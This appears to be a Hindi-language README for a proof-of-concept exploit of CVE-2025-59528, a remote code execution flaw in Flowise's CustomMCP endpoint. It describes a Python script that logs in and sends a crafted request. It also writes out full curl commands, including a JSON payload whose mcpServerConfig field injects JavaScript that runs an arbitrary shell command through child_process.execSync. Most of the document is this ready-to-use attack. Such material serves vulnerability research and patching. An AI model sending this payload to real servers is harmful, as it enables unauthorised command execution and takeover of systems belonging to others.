
CVE-2025-59528 प्रूफ ऑफ कॉन्सेप्ट
Python प्रूफ-ऑफ-कॉन्सेप्ट स्क्रिप्ट Flowise CustomMCP RCE पथ को POST /api/v1/node-load-method/customMCP के माध्यम से ट्रिगर करने के लिए।
⚠️ केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान के लिए। इस टूल को उन सिस्टम्स के विरुद्ध चलाना जिनके आप मालिक नहीं हैं या जिनके परीक्षण के लिए आपके पास लिखित अनुमति नहीं है, अवैध है।
im-soohyun (Kim SooHyun)CVE-2025-59528 के लिए PoC3.0.53.0.6poc.py: मशीन URL/IP, बेयर होस्ट/IP उपयोग होने पर वैकल्पिक प्रोटोकॉल, ईमेल, पासवर्ड, और कमांड मांगता है; लॉग इन करता है, कुकीज़ का पुन: उपयोग करता है, फिर एक तैयार किया गया CustomMCP अनुरोध भेजता है और HTTP स्थिति, हेडर, और प्रतिक्रिया निकाय को curl -i के समान प्रिंट करता है।चलाएँ:
python3 poc.py
फिर प्रदान करें:
10.10.11.10, http://10.10.11.10, या https://target.examplecurl -i -X POST https://<MACHINE_URL/IP>/api/v1/auth/login \
-H "Content-Type: application/json" \
-d '{"email":"<[email protected]>","password":"<password>"}'
curl -i -X POST https://<target>/api/v1/node-load-method/customMCP \
-H "Content-Type: application/json" \
-H "x-request-from: internal" \
-H "Cookie: token=<token>; refreshToken=<refreshToken>; connect.sid=<connect.sid>" \
-d '{
"loadMethod":"listActions",
"inputs":{
"mcpServerConfig":"({x:(function(){const cp = process.mainModule.require(\"child_process\");cp.execSync(\"<command>\");return 1;})()})"
}
}'